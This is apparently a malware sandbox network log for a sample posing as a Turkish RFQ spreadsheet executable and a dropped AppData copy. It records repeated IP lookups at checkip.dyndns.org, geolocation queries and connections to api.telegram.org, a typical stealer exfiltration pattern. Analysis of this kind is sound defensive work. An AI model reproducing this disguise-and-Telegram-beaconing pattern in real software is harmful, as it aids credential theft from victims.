Oct 14, 2024 11:05:33.589067936 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.593195915 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.593208075 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.626938105 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.634320974 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.634421110 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.634490967 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.637701035 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.673346043 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.673528910 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.678126097 CEST	80	49746	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:33.678217888 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.678670883 CEST	80	49735	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:33.679234028 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.680917025 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.685707092 CEST	80	49746	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.086973906 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.098035097 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.098077059 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.228429079 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.228552103 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.228601933 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.229465008 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.256505013 CEST	80	49746	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.258770943 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.258831024 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.258914948 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.259188890 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.259202003 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.285808086 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.291177034 CEST	80	49742	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.291239023 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.295815945 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:34.295846939 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:34.295923948 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:34.296396971 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:34.296413898 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:34.298809052 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.733057022 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.743494034 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.743541002 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.867465019 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.867592096 CEST	443	49748	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:34.867723942 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.868607998 CEST	49748	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:34.872457981 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.873599052 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.877626896 CEST	80	49746	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.877830982 CEST	49746	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.878415108 CEST	80	49750	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.878515005 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.878664017 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:34.883447886 CEST	80	49750	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:34.994234085 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:34.994304895 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:34.998610973 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:34.998619080 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:34.998888969 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:35.008301973 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:35.055401087 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:35.236162901 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:35.236243963 CEST	443	49749	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:35.236351013 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:35.240812063 CEST	49749	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:35.453589916 CEST	80	49750	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:35.455061913 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:35.455127001 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:35.455239058 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:35.455858946 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:35.455878019 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:35.501950979 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:35.924933910 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:35.946409941 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:35.946445942 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:36.075792074 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:36.075922012 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:36.076839924 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:36.077864885 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:36.180941105 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:36.182352066 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:36.187418938 CEST	80	49750	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:36.187469959 CEST	80	49752	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:36.187494993 CEST	49750	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:36.187534094 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:36.189001083 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:36.193924904 CEST	80	49752	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:36.814676046 CEST	80	49752	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:36.816195011 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:36.816227913 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:36.816571951 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:36.816948891 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:36.816962004 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:36.861335039 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:37.296367884 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:37.299031973 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:37.299073935 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:37.442365885 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:37.442488909 CEST	443	49753	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:37.443243027 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:37.443686008 CEST	49753	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:37.453715086 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:37.454910040 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:37.454953909 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:37.455106020 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:37.455630064 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:37.455641985 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:37.458887100 CEST	80	49752	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:37.461420059 CEST	49752	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:38.074915886 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.075006008 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:38.077033997 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:38.077048063 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.077322006 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.078722000 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:38.123404026 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.324623108 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.324691057 CEST	443	49754	149.154.167.220	192.168.2.8
Oct 14, 2024 11:05:38.324767113 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:38.327933073 CEST	49754	443	192.168.2.8	149.154.167.220
Oct 14, 2024 11:05:49.722074032 CEST	49714	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:52.773220062 CEST	49724	80	192.168.2.8	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 11:05:21.525912046 CEST	50580	53	192.168.2.8	1.1.1.1
Oct 14, 2024 11:05:21.532824993 CEST	53	50580	1.1.1.1	192.168.2.8
Oct 14, 2024 11:05:22.403768063 CEST	57284	53	192.168.2.8	1.1.1.1
Oct 14, 2024 11:05:22.413575888 CEST	53	57284	1.1.1.1	192.168.2.8
Oct 14, 2024 11:05:34.286634922 CEST	51981	53	192.168.2.8	1.1.1.1
Oct 14, 2024 11:05:34.293574095 CEST	53	51981	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 11:05:21.525912046 CEST	192.168.2.8	1.1.1.1	0xa7eb	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:22.403768063 CEST	192.168.2.8	1.1.1.1	0x10cf	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:34.286634922 CEST	192.168.2.8	1.1.1.1	0x92c6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:21.532824993 CEST	1.1.1.1	192.168.2.8	0xa7eb	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:22.413575888 CEST	1.1.1.1	192.168.2.8	0x10cf	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:22.413575888 CEST	1.1.1.1	192.168.2.8	0x10cf	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 11:05:34.293574095 CEST	1.1.1.1	192.168.2.8	0x92c6	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:21.549211025 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:22.142424107 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f9cd9c9ea928e3389d962d371c364766 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:22.148425102 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:22.306451082 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49fb884d745aeb74e18db2fcd22384d9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:23.098743916 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:23.256577969 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ef627baeac8d7603cd2b7b588ebd264e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49714	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:23.893131971 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:24.482265949 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0f6c283bf9d11e2f469f8be1f928acc9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49716	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:24.654246092 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:25.222219944 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 295163365c5fee04f152e65292016bfa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:25.230542898 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:25.386651039 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f7725b233d331129ff4babd65953de31 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:25.595448017 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f7725b233d331129ff4babd65953de31 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:26.093873978 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:26.254314899 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e62c6d46c69d1f246bb74ddbf5c9443 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:25.109234095 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:25.694408894 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3abcb5e86daf088571820029609caeb6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49722	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:26.335366011 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:27.722140074 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 939e767856356ac8c24a14a3d9d74e8e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:27.722325087 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 939e767856356ac8c24a14a3d9d74e8e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 14, 2024 11:05:27.722533941 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 939e767856356ac8c24a14a3d9d74e8e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49724	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:27.733222961 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 14, 2024 11:05:28.326275110 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a46e3a2211b479de129c55ab6c84bd38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49726	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:28.343249083 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
